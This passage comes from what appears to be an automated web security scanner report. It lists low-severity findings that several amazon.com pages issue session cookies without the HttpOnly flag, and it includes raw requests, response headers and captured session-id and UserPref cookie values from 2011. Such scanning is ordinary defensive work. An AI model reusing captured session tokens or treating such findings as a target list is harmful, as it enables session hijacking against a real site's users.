Content-Type: text/html
Set-Cookie: clicks=duplicate; expires=Tue, 25-Jan-2011 23:11:22 GMT; path=/
Set-Cookie: userData=se=&keyword=&httpReferer=; path=/
Set-Cookie: ASPSESSIONIDQASCCBDS=EPAJINICMHLKFHLFPHBOJOAC; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
M
...[SNIP]...

14.88. http://www.amazon.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:22 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
x-amz-id-1: 0SBFNHA40PDAQCKXW60Q
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: qBgIWFuA2Wjoamon8NoAG9bdAoR3KqlibGyFaWE7CQvIKyPWqQkJunDX652P1Cp2
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 141800


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...

14.89. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:35 GMT
Server: Server
x-amz-id-1: 0FSERHCXPR6RX175GC9Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kR10u+vmtmJMjH8b0QtzQOA7YFXccTCuWSFp6hNB3ud9u6GhHvfORZRd53Wds1YX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 738612


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

14.90. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:34 GMT
Server: Server
x-amz-id-1: 1X3EPAT3ZMNVCSGSMBAN
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XWFESHf4LDfW4Q4jtyPNlMZUcPixPfxkYZBCrWieQtkwWSKt/X54SoeJ/bATZoKW
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 508145


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

14.91. http://www.amazon.com/b/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /b/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1Z8842RFJJQ53HA29PKK
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Thz+3TyDFYah1x3ei6oQr/mo+vx0XErnPjJ/ljJngQIg1o7JCKD0eSlBevy55XTo
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

14.92. http://www.amazon.com/books-used-books-textbooks/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /books-used-books-textbooks/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books-used-books-textbooks/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:25 GMT
Server: Server
x-amz-id-1: 0PN0C1SZEXY20ARQ0EZ7
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Crev47aQfB2uqb2X//rUO4Hxdev3PyQ/5jNKWV00peXpTx5B0oH6Vgmw1c8EiiK+
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

14.93. http://www.amazon.com/dp/0313363153

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0313363153

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:18 GMT
Server: Server
x-amz-id-1: 1XEKQW5VKEVTKXS2HSJA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeWIrG239x/NdCZhKVLDJEcUlefLzu6eYfgdzbR7oX4dl76GDeDVLHHKaEiGy4dJ
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
Content-Length: 369008


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

14.94. http://www.amazon.com/dp/0814410960

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0814410960

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:30 GMT
Server: Server
x-amz-id-1: 0V1X9WNQCM47PDADFQGC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKWOpw071+vUvE/zvz84QekiVG202hXgMiv2MgQFljVkajAJe9OwpyfODLjeHTmR
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
Content-Length: 398021


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

14.95. http://www.amazon.com/dp/B000EFAO1G

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B000EFAO1G

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:26 GMT
Server: Server
x-amz-id-1: 09N75F9VXRTTHCJ6W4N0
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: BhM/yiIeeNmHNPnM+XNOpz2cQi2I5DL2kxxjVh9EGVEK3Otk7l2KJ92BEBUF6OSA
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT
Content-Length: 378947


<html>
<head>


<style type="text/css"><!--


BODY { fo
...[SNIP]...

14.96. http://www.amazon.com/dp/B001AIM6V2

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B001AIM6V2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:20 GMT
Server: Server
x-amz-id-1: 0JE81R4J15T5AK071TZV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 4o8GRyUKmn3DkY5PnyV64O2bpKKjAgNwr+I4JvwWlUHgakGrnSAutbBsj2pwvLzy
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT
Content-Length: 243877


<html>
<head>


<style type="text/css"><!--


BODY { fon
...[SNIP]...

14.97. http://www.amazon.com/dp/B0037UT1LY

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B0037UT1LY

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:34 GMT
Server: Server
x-amz-id-1: 17DR8YMYSFMRZS8CDJ3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: VnWywM5oGusSEKwA0oEmF9YQZW0sC+3d/bn1D6tOPMIwmjnxiuAhufUUuKPMm5+U
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT
Content-Length: 440777


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

14.98. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dvds-used-hd-action-comedy-oscar/b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dvds-used-hd-action-comedy-oscar/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:30 GMT
Server: Server
x-amz-id-1: 0HWNJZZ0K25G6APS0SCV
